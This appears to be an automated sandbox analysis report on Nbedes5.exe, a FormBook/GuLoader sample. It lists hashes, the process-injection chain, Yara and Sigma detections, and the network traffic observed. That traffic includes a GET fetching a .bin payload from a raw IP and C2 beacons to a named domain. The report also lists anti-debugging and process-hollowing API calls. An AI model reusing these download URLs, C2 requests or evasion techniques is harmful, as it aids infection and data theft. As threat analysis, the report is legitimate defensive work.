Loading ...

Play interactive tourEdit tour

Analysis Report Nbedes5.exe

Overview

General Information

Sample Name:Nbedes5.exe
Analysis ID:297930
MD5:6386849f8a478fd08477053700ee3ea3
SHA1:1c8da40fedbdf778bdce0b580ad2dfb34c829ec7
SHA256:1c81f41c9117ff33b9ef73de5b6e429b571bae3393b8ce9bd4f3f28ba48b276b
Tags:exe

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Nbedes5.exe (PID: 780 cmdline: 'C:\Users\user\Desktop\Nbedes5.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
    • Nbedes5.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\Nbedes5.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6952 cmdline: /c del 'C:\Users\user\Desktop\Nbedes5.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x8624:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 14 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6872
      Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6872

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Nbedes5.exeVirustotal: Detection: 11%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi14_2_02C772F7

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49725 -> 192.210.146.118:80
      Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49752
      Source: global trafficHTTP traffic detected: GET /u2e/?Qzu=LliTtBVPwZEXL&NXI=CLTwbbAHWNHwUgTBGGOjQw89hdV93bv1HgRwxFb1Iv9NJP0kWDsmPbTpQEmmznWuHko/ HTTP/1.1Host: www.pinacle.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
      Source: global trafficHTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 192.210.146.118Cache-Control: no-cache
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_0056505B InternetReadFile,2_2_0056505B
      Source: global trafficHTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 192.210.146.118Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /u2e/?Qzu=LliTtBVPwZEXL&NXI=CLTwbbAHWNHwUgTBGGOjQw89hdV93bv1HgRwxFb1Iv9NJP0kWDsmPbTpQEmmznWuHko/ HTTP/1.1Host: www.pinacle.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.pinacle.online
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Oct 2020 13:37:17 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /u2e/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: Nbedes5.exe, 00000002.00000002.331449051.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.bin
      Source: explorer.exe, 00000005.00000000.312839969.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000005.00000000.314309030.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Nbedes5.exe, 00000000.00000002.252094938.000000000070A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4A5D NtProtectVirtualMemory,0_2_021F4A5D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A9 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F0427 NtSetInformationThread,TerminateProcess,0_2_021F0427
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F505B NtMapViewOfSection,0_2_021F505B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F207F NtWriteVirtualMemory,0_2_021F207F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F5077 NtMapViewOfSection,0_2_021F5077
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F3E60 NtSetInformationThread,TerminateProcess,0_2_021F3E60
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4107 NtSetInformationThread,TerminateProcess,0_2_021F4107
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F03 NtMapViewOfSection,0_2_021F4F03
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F3F NtMapViewOfSection,0_2_021F4F3F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F5F NtWriteVirtualMemory,0_2_021F1F5F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F57 NtWriteVirtualMemory,0_2_021F1F57
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F4F NtMapViewOfSection,0_2_021F4F4F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4F47 NtMapViewOfSection,0_2_021F4F47
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F7F NtWriteVirtualMemory,0_2_021F1F7F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F77 NtWriteVirtualMemory,0_2_021F1F77
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F6F NtWriteVirtualMemory,0_2_021F1F6F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F67 NtWriteVirtualMemory,0_2_021F1F67
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F1F87 NtWriteVirtualMemory,0_2_021F1F87
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A20 NtResumeThread,LdrInitializeThunk,2_2_1E279A20
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_1E279A00
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_1E279660
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A50 NtCreateFile,LdrInitializeThunk,2_2_1E279A50
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_1E2796E0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,2_2_1E279710
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_1E2797A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,2_2_1E279780
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,2_2_1E279860
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279840 NtDelayExecution,LdrInitializeThunk,2_2_1E279840
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_1E2798F0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_1E279910
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279540 NtReadFile,LdrInitializeThunk,2_2_1E279540
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2799A0 NtCreateSection,LdrInitializeThunk,2_2_1E2799A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2795D0 NtClose,LdrInitializeThunk,2_2_1E2795D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279610 NtEnumerateValueKey,2_2_1E279610
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A10 NtQuerySection,2_2_1E279A10
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279670 NtQueryInformationProcess,2_2_1E279670
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279650 NtQueryValueKey,2_2_1E279650
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279A80 NtOpenDirectoryObject,2_2_1E279A80
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2796D0 NtCreateKey,2_2_1E2796D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279730 NtQueryVirtualMemory,2_2_1E279730
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279B00 NtSetValueKey,2_2_1E279B00
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A710 NtOpenProcessToken,2_2_1E27A710
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279760 NtOpenProcess,2_2_1E279760
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279770 NtSetInformationFile,2_2_1E279770
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A770 NtOpenThread,2_2_1E27A770
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27A3B0 NtGetContextThread,2_2_1E27A3B0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279FE0 NtCreateMutant,2_2_1E279FE0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279820 NtEnumerateKey,2_2_1E279820
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27B040 NtSuspendThread,2_2_1E27B040
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2798A0 NtWriteVirtualMemory,2_2_1E2798A0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279520 NtWaitForSingleObject,2_2_1E279520
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E27AD30 NtSetContextThread,2_2_1E27AD30
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279560 NtWriteFile,2_2_1E279560
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E279950 NtQueueApcThread,2_2_1E279950
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2795F0 NtQueryInformationFile,2_2_1E2795F0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2799D0 NtCreateProcessEx,2_2_1E2799D0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00564A5D NtProtectVirtualMemory,2_2_00564A5D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00560878 NtProtectVirtualMemory,2_2_00560878
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00560427 NtSetInformationThread,2_2_00560427
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00564107 NtSetInformationThread,2_2_00564107
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_00563E60 NtSetInformationThread,2_2_00563E60
      Source: C:\Windows\explorer.exeCode function: 5_2_0614BA52 NtCreateFile,5_2_0614BA52
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269710 NtQueryInformationToken,LdrInitializeThunk,14_2_03269710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269780 NtMapViewOfSection,LdrInitializeThunk,14_2_03269780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269FE0 NtCreateMutant,LdrInitializeThunk,14_2_03269FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_03269660
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269650 NtQueryValueKey,LdrInitializeThunk,14_2_03269650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A50 NtCreateFile,LdrInitializeThunk,14_2_03269A50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_032696E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032696D0 NtCreateKey,LdrInitializeThunk,14_2_032696D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_03269910
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269540 NtReadFile,LdrInitializeThunk,14_2_03269540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032699A0 NtCreateSection,LdrInitializeThunk,14_2_032699A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032695D0 NtClose,LdrInitializeThunk,14_2_032695D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269860 NtQuerySystemInformation,LdrInitializeThunk,14_2_03269860
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269840 NtDelayExecution,LdrInitializeThunk,14_2_03269840
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269730 NtQueryVirtualMemory,14_2_03269730
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269B00 NtSetValueKey,14_2_03269B00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A710 NtOpenProcessToken,14_2_0326A710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269760 NtOpenProcess,14_2_03269760
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269770 NtSetInformationFile,14_2_03269770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A770 NtOpenThread,14_2_0326A770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032697A0 NtUnmapViewOfSection,14_2_032697A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326A3B0 NtGetContextThread,14_2_0326A3B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A20 NtResumeThread,14_2_03269A20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A00 NtProtectVirtualMemory,14_2_03269A00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269610 NtEnumerateValueKey,14_2_03269610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A10 NtQuerySection,14_2_03269A10
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269670 NtQueryInformationProcess,14_2_03269670
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269A80 NtOpenDirectoryObject,14_2_03269A80
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269520 NtWaitForSingleObject,14_2_03269520
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326AD30 NtSetContextThread,14_2_0326AD30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269560 NtWriteFile,14_2_03269560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269950 NtQueueApcThread,14_2_03269950
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032695F0 NtQueryInformationFile,14_2_032695F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032699D0 NtCreateProcessEx,14_2_032699D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03269820 NtEnumerateKey,14_2_03269820
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0326B040 NtSuspendThread,14_2_0326B040
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032698A0 NtWriteVirtualMemory,14_2_032698A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032698F0 NtReadVirtualMemory,14_2_032698F0
